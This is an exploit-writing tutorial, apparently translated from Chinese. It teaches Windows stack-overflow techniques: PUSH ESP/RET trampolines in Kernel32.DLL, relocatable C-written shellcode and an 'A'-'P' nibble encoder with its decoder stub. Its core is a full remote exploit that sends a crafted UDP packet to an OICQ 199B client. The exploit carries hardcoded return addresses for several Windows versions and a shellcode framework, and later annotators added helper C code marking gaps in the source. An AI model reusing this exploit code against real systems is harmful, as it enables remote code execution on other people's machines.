Writing techniques under Windows
Author: Yuange
Mail: yuan@163.net

I have seen a number of Windows overflow programs that were neither unified nor polished, so I decided to work out a relatively unified way of writing them and to try to solve a few problems along the way.

1. The JMP ESP problem.

For the sake of uniformity I use code from Kernel32.DLL, because at least on the same system the load address of the Kernel32.DLL module changes little. Other modules may load at different addresses depending on the application software installed: Kernel32.DLL is loaded first, and the load addresses of the modules after it shift as the modules in front of them change. So it is still Kernel32.DLL that is relatively unified (that is, the same across different versions of the same system). To solve the problem that a JMP ESP (FF E4) cannot be found, I also use the sequences

      push esp         (54)
      . . . .
      ret              (C3)
   or
      push esp         (54)
      . . . .
      ret 00XX         (C2 XX 00)   (RET NUM: NUM should not be too big, so restrict it to NUM = 00xx)

which can be found. The ". . . ." stands for a few harmless instructions that do not affect the result. For example, if you find the code

         push esp
         and  al, 08
         ret  10

you can use it. Selection principle: prefer modules that are loaded early, because modules in front are more likely to be the same across different versions. Because module load addresses differ greatly between 9X and NT systems, this method cannot unify across them; I also found that Kernel32.DLL loads at different addresses on WinNT and Win2000, which is a bit . . . . For a specific program one can try to find a JMP ESP inside that program itself, but that address is usually of the form 0x00xxxxxx, which is a problem. Could the program identify the system and then attack accordingly? The program below uses macros for this.

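As an added example (not part of the original article or of the program below), here is the scan that the selection rules above describe, written in C over a constructed byte image: it looks for FF E4 and for 54 ... C3 / 54 ... C2 NN 00 with a bounded gap and the 00xx restriction on the RET operand. The sample image, the `window` parameter and all function names are assumptions of this example. On a real module the offsets would be added to that module's load address (the article gives 0x77e60000 for the Win2000 Kernel32.DLL), and the bytes in between still have to be checked by hand, as the text says; the same scan is what one runs to judge whether a module at a fixed load address exposes such sequences.

```c
#include <stddef.h>
#include <stdio.h>

/* One PUSH ESP ... RET sequence found in an image. */
struct gadget {
    size_t   push_off;   /* offset of the 0x54 (push esp) byte */
    size_t   ret_off;    /* offset of the C3 / C2 byte that follows */
    unsigned ret_imm;    /* 0 for RET, otherwise NN from RET 00NN */
};

/* Find FF E4 (jmp esp). Returns the number of hits, storing up to max offsets. */
size_t find_jmp_esp(const unsigned char *img, size_t len, size_t *out, size_t max)
{
    size_t n = 0;
    for (size_t i = 0; i + 1 < len; i++) {
        if (img[i] == 0xFF && img[i + 1] == 0xE4) {
            if (n < max) out[n] = i;
            n++;
        }
    }
    return n;
}

/* Find 54 ... C3 and 54 ... C2 NN 00 with at most `window` bytes of "..." in
 * between. The rule that the RET operand must be 00xx is enforced by requiring
 * the high byte of the imm16 to be zero. The bytes in between are not
 * disassembled; the caller has to confirm they are harmless instructions. */
size_t find_push_esp_ret(const unsigned char *img, size_t len, size_t window,
                         struct gadget *out, size_t max)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++) {
        if (img[i] != 0x54) continue;
        for (size_t j = i + 1; j <= i + 1 + window && j < len; j++) {
            struct gadget g = { i, j, 0 };
            int hit = 0;
            if (img[j] == 0xC3) {
                hit = 1;
            } else if (img[j] == 0xC2 && j + 2 < len && img[j + 2] == 0x00) {
                g.ret_imm = img[j + 1];
                hit = 1;
            }
            if (hit) {
                if (n < max) out[n] = g;
                n++;
                break;   /* report the first usable RET after this PUSH ESP */
            }
        }
    }
    return n;
}

/* Constructed sample image (not a real module); offsets noted per line. */
static const unsigned char sample_image[] = {
    0x55, 0x8B, 0xEC,                               /* 0-2   push ebp; mov ebp,esp               */
    0x54, 0x24, 0x08, 0xC2, 0x10, 0x00,             /* 3-8   push esp; and al,08; ret 0010       */
    0x90, 0x90,                                     /* 9-10  nop; nop                            */
    0xFF, 0xE4,                                     /* 11-12 jmp esp                             */
    0x54, 0xC2, 0x00, 0x04,                         /* 13-16 push esp; ret 0400: NUM too big     */
    0x54, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xC3, /* 17-24 push esp; 6 nops; ret: gap > window */
    0x54, 0x40, 0xC3                                /* 25-27 push esp; inc eax; ret              */
};

static size_t scan_sample(struct gadget *g, size_t max)
{
    return find_push_esp_ret(sample_image, sizeof sample_image, 4, g, max);
}

size_t sample_jmp_esp_count(void)  { size_t o[4]; return find_jmp_esp(sample_image, sizeof sample_image, o, 4); }
size_t sample_jmp_esp_offset(size_t idx) { size_t o[4]; size_t n = find_jmp_esp(sample_image, sizeof sample_image, o, 4); return idx < n ? o[idx] : (size_t)-1; }
size_t sample_gadget_count(void)   { struct gadget g[8]; return scan_sample(g, 8); }
size_t sample_gadget_push_off(size_t idx) { struct gadget g[8]; size_t n = scan_sample(g, 8); return idx < n ? g[idx].push_off : (size_t)-1; }
size_t sample_gadget_ret_off(size_t idx)  { struct gadget g[8]; size_t n = scan_sample(g, 8); return idx < n ? g[idx].ret_off : (size_t)-1; }
unsigned sample_gadget_ret_imm(size_t idx) { struct gadget g[8]; size_t n = scan_sample(g, 8); return idx < n ? g[idx].ret_imm : 0xFFFF; }

int main(void)
{
    struct gadget g[8];
    size_t n = scan_sample(g, 8);
    for (size_t i = 0; i < n; i++)
        printf("push esp at +%zu, ret at +%zu, imm 00%02X\n", g[i].push_off, g[i].ret_off, g[i].ret_imm);
    printf("jmp esp sequences: %zu\n", sample_jmp_esp_count());
    return 0;
}
```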
2. How the shellcode is written.

Many existing programs write the shellcode as a string of "\xaa\xbb" bytes. That is not nice to work with, and it is hard to see what the shellcode does. So the idea is to write the shellcode together with the overflow program, in C. This places some requirements on how the shellcode is written: the shellcode must be relocatable code, meaning the whole block still works as usual after being moved to any other address. To reduce incompatibility, function addresses are obtained through LoadLibrary and GetProcAddress, so the shellcode depends only on those two addresses. In fact those two can also be located in memory in the Kernel32.DLL module and the function table generated from it, in which case only the JMP ESP address remains non-uniform across WinNT, Win2000 and Win9x.

The prototype is roughly written in the program. A few questions remain:

   1. Determining the code address of the shellcode function: taking the function's address directly gives the address of a JMP to the shellcode, and there should be a more direct way.
   2. The shellcode often contains calls to _chkesp. This can be handled by how the code is written, or the Call _chkesp inside the code can be found and filled with NOPs.
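The relocatability requirement above can be checked mechanically: every E8 (call rel32) or E9 (jmp rel32) in the copied code resolves to an absolute target, and a target outside the copied block is a dependency on the address the code was compiled for, which is exactly what the debug compiler's call _chkesp is. As an added example that is not the article's code, the following C lists those references over a constructed blob; the blob, its assumed base address and the function names are this example's own assumptions, and it is a byte scan like the article's cleaning loop rather than a disassembler, so an E8/E9 byte inside data would be reported too.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* One E8 (call rel32) or E9 (jmp rel32) found in a code blob. */
struct relref {
    size_t   off;        /* offset of the opcode inside the blob */
    int32_t  rel;        /* the signed displacement */
    uint32_t target;     /* absolute target when the blob sits at `base` */
    int      internal;   /* 1 if the target lies inside the blob */
};

/* Scan `len` bytes compiled to live at `base` (the address of the C function
 * they were copied from) and list every E8/E9 with its resolved target.
 * target = base + offset of next instruction + rel32. Returns the count. */
size_t scan_rel32(const unsigned char *blob, size_t len, uint32_t base,
                  struct relref *out, size_t max)
{
    size_t n = 0;
    for (size_t i = 0; i + 5 <= len; i++) {
        if (blob[i] != 0xE8 && blob[i] != 0xE9) continue;
        int32_t rel = (int32_t)((uint32_t)blob[i + 1] | (uint32_t)blob[i + 2] << 8 |
                                (uint32_t)blob[i + 3] << 16 | (uint32_t)blob[i + 4] << 24);
        uint32_t target = base + (uint32_t)(i + 5) + (uint32_t)rel;
        struct relref r = { i, rel, target, target >= base && target < base + len };
        if (n < max) out[n] = r;
        n++;
    }
    return n;
}

/* Number of references that leave the blob, i.e. that break once it is moved. */
size_t count_external(const struct relref *refs, size_t n)
{
    size_t ext = 0;
    for (size_t i = 0; i < n; i++) if (!refs[i].internal) ext++;
    return ext;
}

/* Constructed 24-byte blob, assumed to have been compiled at 0x00401000. */
static const uint32_t sample_base = 0x00401000u;
static const unsigned char sample_blob[] = {
    0xE8, 0x0A, 0x00, 0x00, 0x00,   /* 0:  call +0x0A  -> base+0x0F (inside)            */
    0x90, 0x90, 0x90, 0x90, 0x90,   /* 5:  padding                                      */
    0xE8, 0x00, 0x10, 0x00, 0x00,   /* 10: call +0x1000 -> base+0x100F (outside: _chkesp-like) */
    0x90, 0x90, 0x90, 0x90,         /* 15: padding                                      */
    0xE9, 0xFB, 0xFF, 0xFF, 0xFF    /* 19: jmp -5 -> base+0x13 (inside, jumps to itself) */
};

static size_t scan_sample(struct relref *r, size_t max)
{
    return scan_rel32(sample_blob, sizeof sample_blob, sample_base, r, max);
}

size_t   sample_ref_count(void)      { struct relref r[8]; return scan_sample(r, 8); }
size_t   sample_external_count(void) { struct relref r[8]; size_t n = scan_sample(r, 8); return count_external(r, n); }
uint32_t sample_target(size_t idx)   { struct relref r[8]; size_t n = scan_sample(r, 8); return idx < n ? r[idx].target : 0; }
int      sample_internal(size_t idx) { struct relref r[8]; size_t n = scan_sample(r, 8); return idx < n ? r[idx].internal : -1; }

int main(void)
{
    struct relref r[8];
    size_t n = scan_sample(r, 8);
    for (size_t i = 0; i < n; i++)
        printf("+%zu: %s rel %d -> 0x%08X %s\n", r[i].off, sample_blob[r[i].off] == 0xE8 ? "call" : "jmp",
               r[i].rel, r[i].target, r[i].internal ? "(inside blob)" : "(ABSOLUTE DEPENDENCY)");
    printf("%zu of %zu references leave the blob\n", count_external(r, n), n);
    return 0;
}
```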

3. The characters allowed in the shellcode are often restricted, so I decided to encode the shellcode: a small piece of code that decodes it is placed in front of the shellcode, and the shellcode is encoded to meet the requirements, which reduces the constraints on writing the shellcode itself. For different requirements it is mainly this small piece of code that is rewritten.

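The encoding the program below uses (the nibble loop in main and the decoder in shellcodefnlock) maps each byte to two bytes 0x41 + high nibble and 0x41 + low nibble, so the encoded data consists only of 'A'..'P'. As an added example that is not the article's code, the following C implements that encoder and an emulation of the decoder loop exactly as the stub executes it (lodsw; sub ax,4141; shl al,4; xor al,ah; stosb; cmp ah,10; jb), including the edge case that the stub stores one garbage byte from the terminating pair before it exits. The function names and the sample bytes are this example's assumptions; stub_decode recovers the original bytes from the encoded region of a captured packet, which is how an analyst would read such a payload.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Encode each byte as 0x41 + high nibble, 0x41 + low nibble ('A'..'P' only).
 * Returns 2*n, or 0 if out is too small. */
size_t nibble_encode(const unsigned char *in, size_t n, unsigned char *out, size_t cap)
{
    if (cap < 2 * n) return 0;
    for (size_t i = 0; i < n; i++) {
        out[2 * i]     = (unsigned char)(0x41 + (in[i] >> 4));
        out[2 * i + 1] = (unsigned char)(0x41 + (in[i] & 0x0f));
    }
    return 2 * n;
}

/* Emulate the decoder stub instruction by instruction:
 *   lodsw        ax = in[si] | in[si+1] << 8      (al = first byte, ah = second)
 *   sub ax,4141h (16-bit, so a first byte below 0x41 borrows from ah)
 *   shl al,4 ; xor al,ah ; stosb
 *   cmp ah,10h ; jb looplock
 * The byte is stored BEFORE the exit test, so the pair that ends the loop
 * (second byte outside 'A'..'P', e.g. the 0x90 padding in the packet) also
 * produces one garbage byte. Returns the number of bytes stored; *terminated
 * is 1 if the loop ended on such a pair rather than by running out of input. */
size_t stub_decode(const unsigned char *in, size_t n, unsigned char *out, size_t cap, int *terminated)
{
    size_t si = 0, di = 0;
    *terminated = 0;
    while (si + 1 < n && di < cap) {
        unsigned ax = ((in[si] | (in[si + 1] << 8)) - 0x4141u) & 0xffffu;
        unsigned al = ax & 0xff, ah = ax >> 8;
        al = ((al << 4) & 0xff) ^ ah;
        out[di++] = (unsigned char)al;
        si += 2;
        if (ah >= 0x10) { *terminated = 1; break; }
    }
    return di;
}

/* Decode and drop the garbage byte when the loop ended on a terminator pair.
 * Returns the length of the recovered data. */
size_t payload_decode(const unsigned char *in, size_t n, unsigned char *out, size_t cap)
{
    int term;
    size_t di = stub_decode(in, n, out, cap, &term);
    return (term && di > 0) ? di - 1 : di;
}

/* Constructed sample: four bytes, followed in the tests by the 0x90 padding. */
static const unsigned char sample_raw[4] = { 0x31, 0xC0, 0x50, 0x68 };

static size_t encode_sample(unsigned char *enc, size_t cap)
{
    size_t n = nibble_encode(sample_raw, sizeof sample_raw, enc, cap);
    enc[n] = 0x90; enc[n + 1] = 0x90;     /* padding that ends the decoder loop */
    return n + 2;
}

int sample_encoded_is_alpha(void)         /* 1 if every encoded byte is in 'A'..'P' */
{
    unsigned char enc[16];
    size_t n = encode_sample(enc, sizeof enc) - 2;
    for (size_t i = 0; i < n; i++) if (enc[i] < 'A' || enc[i] > 'P') return 0;
    return n == 8;
}

int sample_encoded_equals(const char *s)  /* 1 if the 8 encoded bytes equal s */
{
    unsigned char enc[16];
    encode_sample(enc, sizeof enc);
    return memcmp(enc, s, 8) == 0;
}

int sample_roundtrip_ok(void)             /* 1 if payload_decode(encode(x)) == x */
{
    unsigned char enc[16], dec[16];
    size_t total = encode_sample(enc, sizeof enc);
    size_t m = payload_decode(enc, total, dec, sizeof dec);
    return m == 4 && memcmp(dec, sample_raw, 4) == 0;
}

unsigned sample_terminator_garbage(void)  /* the extra byte the stub stores on exit */
{
    unsigned char enc[16], dec[16];
    int term;
    size_t total = encode_sample(enc, sizeof enc);
    size_t m = stub_decode(enc, total, dec, sizeof dec, &term);
    return (m == 5 && term) ? dec[4] : 0x100;
}

int main(void)
{
    unsigned char enc[16];
    size_t total = encode_sample(enc, sizeof enc);
    printf("encoded: %.8s (+%zu padding bytes), garbage byte on exit: 0x%02X\n",
           enc, total - 8, sample_terminator_garbage());
    return 0;
}
```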
/*  OICQ 199B build 0220 overflow program
    Copy by Yuange
    2000.04.18
    The new version 0410 also has a stack overflow; this program can attack it,
    but the shellcode does not execute there.
*/

#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NUKEWIN2000
//#define NUKEWIN9X

#ifdef NUKEWIN2000
#define RETEIPADDR              eipwin2000
#define LOADLIBRARYFNADDRESS    0x77e78023  // 0x77e60000+0x00018023  LoadLibrary
#define GETPROCADDRESSFNADDRESS 0x77e7564b  // 0x77e60000+0x0001564B  GetProcAddress
#else
  #ifdef NUKEWIN9X
  #define RETEIPADDR              eipwin9x
  #define LOADLIBRARYFNADDRESS    0xbff77750  // 0xBFF70000+0x00007750  LoadLibrary
  #define GETPROCADDRESSFNADDRESS 0xbff76e28  // 0xBFF70000+0x00006E28  GetProcAddress
  #else
  #define RETEIPADDR              eipwinnt
  #define LOADLIBRARYFNADDRESS    0x77ee391a  // 0x77ed0000+0x0001391a  LoadLibrary
  #define GETPROCADDRESSFNADDRESS 0x77ee4111  // 0x77ed0000+0x00014111  GetProcAddress
  #endif
#endif

#define NOPCODE     0x90
#define BUFFSIZE    0x2000
#define OICQPORT    4000
#define OICQOVERADD 7+0x41C
#define OVERADD     OICQOVERADD
#define STR0 0
#define STR1 11
#define STR2 23
#define STR3 33
#define STR4 39
#define STR5 51

void shellcodefnlock(void);
void shellcodefn(void);
void cleanchkesp(char *fnadd, char *shellbuff, char *chkespadd, int len);
void _chkesp(void);     /* MSVC debug CRT stack-pointer check; referenced so its address can be located */

int main(int argc, char **argv)
{
    char *server;
    /* Strings the shellcode looks up; the STRn offsets index into this block.
       The MessageBoxA caption (STR2, 9 chars) and text (STR3, 5 chars) are not
       legible in the source text; the placeholders below have the same lengths so
       the offsets stay valid. The array is 0x80 bytes because 0x80 bytes of it
       are appended to the shellcode. */
    char str[0x80] = "user32.dll" "\x0" "MessageBoxA" "\x0" "CAPTION_9" "\x0" "TEXT5" "\x0" "msvcrtd.dll" "\x0" "exit";
    /* OICQ udp head */
    char buff1[] = "\x02\x01\x07\x00\x78\x11\x22\x33\x33\x1f\x30\x1f\x37\x35\x1f" "2000-4-10" "\x1f" "12:00:00" "\x1f";

    // 0x77ed0000+0x1ddd4  kernel32.dll  // push esp  // and al,08  // ret 0C
    char eipwinnt[]    = "\xd4\xdd\xee\x77";   // 0x77ed0000+0x0001ddd4

    // kernel32.dll  // push esp  // and al,08  // ret 0C
    // (the source text shows only the last byte of this array; the bytes follow
    //  from the address given in the comment)
    char eipwin2000[]  = "\xea\x17\xe8\x77";   // 0x77e60000+0x000217EA

    // 0x77e2e32a user32.dll JMP ESP
    char eip2win2000[] = "\x2a\xe3\xe2\x77";   // 0x77df0000+0x0003E32A

    // Kernel32.dll 4.10.2184  0xBFF70000+0x00006AD9
    // push esp  // and al,0x10  // ret 0x10
    char eipwin9x[]    = "\xd9\x6a\xf7\xbf";   // 0xBFF70000+0x00006AD9

    char   buff[BUFFSIZE];
    char   shellcodebuff[0x1000];
    struct sockaddr_in s_in2, s_in3;
    struct hostent *he;
    char   *shellcodefnadd, *chkespadd;
    unsigned int sendpacketlong;
    unsigned int i, j, k;
    unsigned char temp;
    int    fd;
    u_short port, port1;
    unsigned long d_ip;     /* declared as SOCKET in the source text; inet_addr() returns an unsigned long */
    WSADATA wsadata;
    int    result;

    result = WSAStartup(MAKEWORD(1, 1), &wsadata);
    if (result != 0) {
        fprintf(stderr, "Your computer was not connected "
                        "to the internet at the time that "
                        "this program was launched, or you "
                        "do not have a 32-bit ");     /* message is cut off in the source text */
        exit(1);
    }

    if (argc < 2)
    {
        WSACleanup();
        fprintf(stderr, "\nNuke OICQ.\nCopy by yuange 2000.4.1.\nWelcome to my homepage http://yuange.yeah.net.");
        fprintf(stderr, "\nusage: %s <server> [port]\n", argv[0]);
        exit(1);
    }
    else server = argv[1];

    d_ip = inet_addr(server);
    if (d_ip == -1) {
        he = gethostbyname(server);
        if (!he)
        {
            WSACleanup();
            printf("\ncan't get the ip of %s!\n", server);
            exit(1);
        }
        else memcpy(&d_ip, he->h_addr, 4);
    }
    if (argc > 2) port = atoi(argv[2]);
    else port = OICQPORT;
    if (port == 0) port = OICQPORT;

    fd = socket(AF_INET, SOCK_DGRAM, 0);
    i = 8000;
    setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (const char *)&i, sizeof(i));
    s_in2.sin_family = AF_INET;
    if (argc > 3) port1 = atoi(argv[3]);
    else port1 = OICQPORT;
    if (port1 == 0) port1 = OICQPORT;
    s_in2.sin_port = htons(port1);
    s_in2.sin_addr.s_addr = 0;

    s_in3.sin_family = AF_INET;
    s_in3.sin_port = htons(port);
    s_in3.sin_addr.s_addr = d_ip;
    bind(fd, (const struct sockaddr FAR *)&s_in2, sizeof(struct sockaddr_in));
    printf("\nNuke IP:%s port %d", inet_ntoa(s_in3.sin_addr), htons(s_in3.sin_port));

    memset(buff, NOPCODE, BUFFSIZE);
    memcpy(buff, buff1, sizeof(buff1) - 1);   /* the source text copies 37 bytes, which reads past buff1 */

    /* Locate _chkesp. The compare mirrors what the compiler emits so that the
       function is referenced; an incremental-link build gives the address of a
       JMP (E9 rel32) thunk, which is followed to the real function. */
    _asm {
        mov esi, esp
        cmp esi, esp
    }
    _chkesp();
    chkespadd = (char *)_chkesp;
    temp = *chkespadd;
    if (temp == 0xe9) {
        chkespadd++;
        chkespadd += *(int *)chkespadd + 4;     /* target = next instruction + rel32 */
    }

    /* The decoder: skip the four leading NOPs of shellcodefnlock, copy up to its
       trailing NOPs. The source text copies a fixed 8 bytes here, which is
       shorter than the decoder; copy the whole stub instead. */
    shellcodefnadd = (char *)shellcodefnlock;
    temp = *shellcodefnadd;
    if (temp == 0xe9) {
        shellcodefnadd++;
        shellcodefnadd += *(int *)shellcodefnadd + 4;
    }
    for (k = 0; k <= 0x500; k++) {
        if (memcmp(shellcodefnadd + k, "\x90\x90\x90\x90", 4) == 0) break;
    }
    for (j = k + 4; j <= 0x500; j++) {
        if (memcmp(shellcodefnadd + j, "\x90\x90\x90\x90", 4) == 0) break;
    }
    memcpy(buff + OVERADD + 0x20, shellcodefnadd + k + 4, j - k - 4);

    /* The shellcode body: from the start of shellcodefn up to its trailing NOPs. */
    shellcodefnadd = (char *)shellcodefn;
    temp = *shellcodefnadd;
    if (temp == 0xe9) {
        shellcodefnadd++;
        shellcodefnadd += *(int *)shellcodefnadd + 4;
    }
    for (k = 0; k <= 0x1000; k++) {
        if (memcmp(shellcodefnadd + k, "\x90\x90\x90\x90", 4) == 0) break;
    }

    memcpy(shellcodebuff, shellcodefnadd, k);       // j);
    cleanchkesp(shellcodefnadd, shellcodebuff, chkespadd, k);

    /* The strings go right after the call getstradd, where stradd will point. */
    memcpy(shellcodebuff + k, str, 0x80);
    sendpacketlong = k + 0x80;
    for (k = 0; k <= 0x200; k++) {
        if (memcmp(buff + OVERADD + 0x20 + k, "\x90\x90\x90\x90", 4) == 0) break;
    }

    /* Encode shellcode + strings as two 'A'..'P' bytes per byte, placed right
       after the decoder. The loop bound is cut off in the source text;
       sendpacketlong (shellcode + strings) is what the code above computed. */
    for (i = 0; i < sendpacketlong; i++) {
        temp = shellcodebuff[i];
        temp &= 0xf0;
        temp = temp / 0x10;
        temp += 0x41;
        buff[OVERADD + 0x20 + k] = temp;
        k++;
        temp = shellcodebuff[i];
        temp &= 0x0f;
        temp += 0x41;
        buff[OVERADD + 0x20 + k] = temp;
        k++;
    }
    memcpy(buff + OVERADD, RETEIPADDR, 4);
    sendpacketlong = OVERADD + 0x20 + k + 0x10;
    for (i = 0; i < 1; i++) {
        j = rand();
        buff[0x5] = (char)j;          /* the source text writes buff1 here, which was already copied into buff */
        buff[0x6] = (char)(j + 1);
        j = sendpacketlong;
        buff[j - 1] = 0x03;
        fprintf(stderr, "\nsend packet %d bytes.", j);
        sendto(fd, buff, j, 0, (const struct sockaddr FAR *)&s_in3, sizeof(struct sockaddr_in));
    }
    closesocket(fd);
    WSACleanup();
    return 0;
}

void shellcodefnlock(void)
{
    _asm {
        nop
        nop
        nop
        nop
        jmp    next
    getediadd:
        pop    edi              ; edi = address of shell, where the encoded data starts
        push   edi
        pop    esi              ; esi = edi: decode in place
    looplock:
        lodsw                   ; al = first byte of the pair, ah = second
        sub    ax, 0x4141
        shl    al, 4
        xor    al, ah           ; al = (high nibble << 4) | low nibble
        stosb
        cmp    ah, 0x10         ; a second byte outside 'A'..'P' ends the loop
        jb     looplock
        jmp    shell
    next:
        call   getediadd
    shell:
        nop
        nop
        nop
        nop
    }
}

void shellcodefn(void)
{
//  const char str[] = "user32.dll" "\x0" "MessageBoxA" "\x0" "msvcrtd.dll" "\x0" "exit";
    FARPROC procloadlib, procgetadd, procmsg, procexit;
    char    *stradd;
    HANDLE  libhandle;
    procloadlib = (FARPROC)LOADLIBRARYFNADDRESS;
    procgetadd  = (FARPROC)GETPROCADDRESSFNADDRESS;
    _asm {
        jmp    nextcall
    getstradd:
        pop    stradd           ; stradd = address of the data following the call
    }
    libhandle = (HANDLE)procloadlib(stradd + STR0);
    procmsg   = (FARPROC)procgetadd(libhandle, stradd + STR1);
    procmsg(0, stradd + STR3, stradd + STR2, 0);
//  libhandle     = procloadlib(stradd + STR6);
//  opensocketadd = procgetadd(stradd + STR7);
    libhandle = (HANDLE)procloadlib(stradd + STR4);
    procexit  = (FARPROC)procgetadd(libhandle, stradd + STR5);
    procexit(0);
    _asm {
    die:
        jmp    die
    nextcall:
        call   getstradd
        nop
        nop
        nop
        nop
    }
}

/* Replace every call _chkesp in the copied shellcode with five harmless bytes.
   fnadd is where the code was compiled to run, so the call targets are
   resolved against it rather than against shellbuff. */
void cleanchkesp(char *fnadd, char *shellbuff, char *chkesp, int len)
{
    int  i, k;
    unsigned char temp;
    char *calladd;

    for (i = 0; i < len; i++) {
        temp = shellbuff[i];
        if (temp == 0xe8) {
            k = *(int *)(shellbuff + i + 1);    /* rel32 of the call */
            calladd = fnadd;                    /* target = fnadd + i + 5 + rel32 */
            calladd += k;
            calladd += i;
            calladd += 5;
            if (calladd == chkesp) {
                shellbuff[i]     = 0x90;        // nop
                shellbuff[i + 1] = 0x43;        // inc ebx
                shellbuff[i + 2] = 0x4b;        // dec ebx
                shellbuff[i + 3] = 0x43;
                shellbuff[i + 4] = 0x4b;
            }
        }
    }
}
/* The OICQ code that has the problem

:00425D51 837C240800              cmp dword ptr [esp+08], 00000000
:00425D56 740C                    je 00425D64
:00425D58 8B01                    mov eax, dword ptr [ecx]
:00425D5A FF742408                push [esp+08]
:00425D5E FF90B8000000            call dword ptr [eax+000000B8]

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00425D56(C)
|
:00425D64 33C0                    xor eax, eax
:00425D66 C20800                  ret 0008


:00425D69 B8E4774900              mov eax, 004977E4
:00425D6E E80D700300              call 0045CD80
:00425D73 81EC10040000            sub esp, 00000410      <- buffer size; has overflow  YRG 2000.04.18

:00425D79 53                      push ebx
:00425D7A 56                      push esi
:00425D7B 8B7508                  mov esi, dword ptr [ebp+08]
:00425D7E 8D85E4FBFFFF            lea eax, dword ptr [ebp+FFFFFBE4]
:00425D84 57                      push edi
:00425D85 50                      push eax
:00425D86 FF7628                  push [esi+28]
:00425D89 8BD9                    mov ebx, ecx
:00425D8B FF7624                  push [esi+24]
:00425D8E E8C9000000              call 00425E5C
:00425D93 85C0                    test eax, eax
:00425D95 0F84B0000000            je 00425E4B
:00425D9B 8D85E8FBFFFF            lea eax, dword ptr [ebp+FFFFFBE8]
:00425DA1 8D4DF0                  lea ecx, dword ptr [ebp-10]
:00425DA4 50                      push eax
:00425DA5 E8CFF10400              call 00474F79
:00425DAA 8365FC00                and dword ptr [ebp-04], 00000000
:00425DAE 8BBDE6FBFFFF            mov edi, dword ptr [ebp+FFFFFBE6]
:00425DB4 56                      push esi
:00425DB5 8D4D08                  lea ecx, dword ptr [ebp+08]
:00425DB8 E8BCF10400              call 00474F79
:00425DBD 0FB785E4FBFFFF          movzx eax, word ptr [ebp+FFFFFBE4]
:00425DC4 8B7620                  mov esi, dword ptr [esi+20]
:00425DC7 83E878                  sub eax, 00000078
:00425DCA C645FC01                mov [ebp-04], 01
:00425DCE 7434                    je 00425E04
:00425DD0 48                      dec eax
:00425DD1 7560                    jne 00425E33
:00425DD3 51                      push ecx
:00425DD4 8D45F0                  lea eax, dword ptr [ebp-10]
:00425DD7 8BCC                    mov ecx, esp
:00425DD9 8965EC                  mov dword ptr [ebp-14], esp
:00425DDC 50                      push eax
:00425DDD E89EEE0400              call 00474C80
:00425DE2 57                      push edi
:00425DE3 56                      push esi
:00425DE4 51                      push ecx
:00425DE5 8D4508                  lea eax, dword ptr [ebp+08]
:00425DE8 8BCC                    mov ecx, esp
:00425DEA 8965E8                  mov dword ptr [ebp-18], esp
:00425DED 50                      push eax
:00425DEE C645FC03                mov [ebp-04], 03
:00425DF2 E889EE0400              call 00474C80
:00425DF7 8BCB                    mov ecx, ebx
:00425DF9 C645FC01                mov [ebp-04], 01
:00425DFD E8D4030000              call 004261D6
:00425E02 EB2F                    jmp 00425E33

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00425DCE(C)
|
:00425E04 51                      push ecx
:00425E05 8D45F0                  lea eax, dword ptr [ebp-10]
:00425E08 8BCC                    mov ecx, esp
:00425E0A 8965E8                  mov dword ptr [ebp-18], esp
:00425E0D 50                      push eax
:00425E0E E86DEE0400              call 00474C80
:00425E13 57                      push edi
:00425E14 56                      push esi
:00425E15 51                      push ecx
:00425E16 8D4508                  lea eax, dword ptr [ebp+08]
:00425E19 8BCC                    mov ecx, esp
:00425E1B 8965EC                  mov dword ptr [ebp-14], esp
:00425E1E 50                      push eax
:00425E1F C645FC02                mov [ebp-04], 02
:00425E23 E858EE0400              call 00474C80
:00425E28 8BCB                    mov ecx, ebx
:00425E2A C645FC01                mov [ebp-04], 01
:00425E2E E860040000              call 00426293

* Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
|:00425DD1(C), :00425E02(U)
|
:00425E33 8065FC00                and byte ptr [ebp-04], 00
:00425E37 8D4D08                  lea ecx, dword ptr [ebp+08]
:00425E3A E8CCF00400              call 00474F0B
:00425E3F 834DFCFF                or dword ptr [ebp-04], FFFFFFFF
:00425E43 8D4DF0                  lea ecx, dword ptr [ebp-10]
:00425E46 E8C0F00400              call 00474F0B

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00425D95(C)
|
:00425E4B 8B4DF4                  mov ecx, dword ptr [ebp-0C]
:00425E4E 5F                      pop edi
:00425E4F 5E                      pop esi
:00425E50 64890D00000000          mov dword ptr fs:[00000000], ecx
:00425E57 5B                      pop ebx
:00425E58 C9                      leave
:00425E59 C20400                  ret 0004
*/
/* OICQ message UDP data structure, see Zer9's "OICQ security issues"
struct toicqptop
{
    char tag1;          // 0x02  obviously the OICQ protocol number or version, fixed
    char tag2;          // 0x01  obviously the OICQ protocol number or version, fixed
    char tag3;          // 0x07
    char tag4;          // 0x00
    char tag5;          // 0x78
    char tag6;          // these two bytes are like the process ID on UNIX,
    char tag7;          // and can be assigned arbitrarily.
    char coicqnub[];    // the sender's OICQ number, e.g. 123456
    char cff;           // 0x1f  in all OICQ message structures the separator is 0x1f
    char cr;            // '0', fixed
    char cff;
    char ce[];          // "75", relatively fixed; may be an operation type.
    char cff;
    char cdatetime[];   // e.g. "2000-4-10", 0x1f, "12:00:12", 0x1f
    char outmsg[];      // the message content sent.
    char cend;          // 0x03, all OICQ messages end with 0x03.
}
*/